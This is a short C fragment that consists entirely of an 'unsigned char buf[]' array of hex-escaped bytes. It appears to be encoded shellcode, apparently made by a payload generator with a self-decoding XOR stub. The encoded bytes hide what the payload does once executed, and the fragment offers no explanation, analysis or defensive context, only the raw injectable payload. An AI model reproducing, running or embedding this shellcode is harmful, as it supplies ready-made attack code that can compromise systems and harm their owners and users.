unsigned char buf[] = 
"\xba\xc3\xa1\xcb\x71\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9"
"\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x94\xaf\x29\x84\xe6"
"\x58\x2f\x67\x16\x99\x50\xe1\xf3\xa8\x50\x95\x70\x9a\x60"
"\xdd\xd4\x17\x0a\xb3\xcc\xac\x7e\x1c\xe3\x05\x34\x7a\xca"
"\x96\x65\xbe\x4d\x15\x74\x93\xad\x24\xb7\xe6\xac\x61\xaa"
"\x0b\xfc\x3a\xa0\xbe\x10\x4e\xfc\x02\x9b\x1c\x10\x03\x78"
"\xd4\x13\x22\x2f\x6e\x4a\xe4\xce\xa3\xe6\xad\xc8\xa0\xc3"
"\x64\x63\x12\xbf\x76\xa5\x6a\x40\xd4\x88\x42\xb3\x24\xcd"
"\x65\x2c\x53\x27\x96\xd1\x64\xfc\xe4\x0d\xe0\xe6\x4f\xc5"
"\x52\xc2\x6e\x0a\x04\x81\x7d\xe7\x42\xcd\x61\xf6\x87\x66"
"\x9d\x73\x26\xa8\x17\xc7\x0d\x6c\x73\x93\x2c\x35\xd9\x72"
"\x50\x25\x82\x2b\xf4\x2e\x2f\x3f\x85\x6d\x38\x8c\xa4\x8d"
"\xb8\x9a\xbf\xfe\x8a\x05\x14\x68\xa7\xce\xb2\x6f\xc8\xe4"
"\x03\xff\x37\x07\x74\xd6\xf3\x53\x24\x40\xd5\xdb\xaf\x90"
"\xda\x09\x7f\xc0\x74\xe2\xc0\xb0\x34\x52\xa9\xda\xba\x8d"
"\xc9\xe5\x10\xa6\x60\x1c\xf3\x65\x63\x54\x7e\x1e\x8e\x68"
"\xa7\xd1\x07\x8e\xcd\xfd\x41\x19\x7a\x67\xc8\xd1\x1b\x68"
"\xc6\x9c\x1c\xe2\xe5\x61\xd2\x03\x83\x71\x83\xe3\xde\x2b"
"\x02\xfb\xf4\x43\xc8\x6e\x93\x93\x87\x92\x0c\xc4\xc0\x65"
"\x45\x80\xfc\xdc\xff\xb6\xfc\xb9\x38\x72\xdb\x79\xc6\x7b"
"\xae\xc6\xec\x6b\x76\xc6\xa8\xdf\x26\x91\x66\x89\x80\x4b"
"\xc9\x63\x5b\x27\x83\xe3\x1a\x0b\x14\x75\x23\x46\xe2\x99"
"\x92\x3f\xb3\xa6\x1b\xa8\x33\xdf\x41\x48\xbb\x0a\xc2\x68"
"\x5e\x9e\x3f\x01\xc7\x4b\x82\x4c\xf8\xa6\xc1\x68\x7b\x42"
"\xba\x8e\x63\x27\xbf\xcb\x23\xd4\xcd\x44\xc6\xda\x62\x64"
"\xc3";
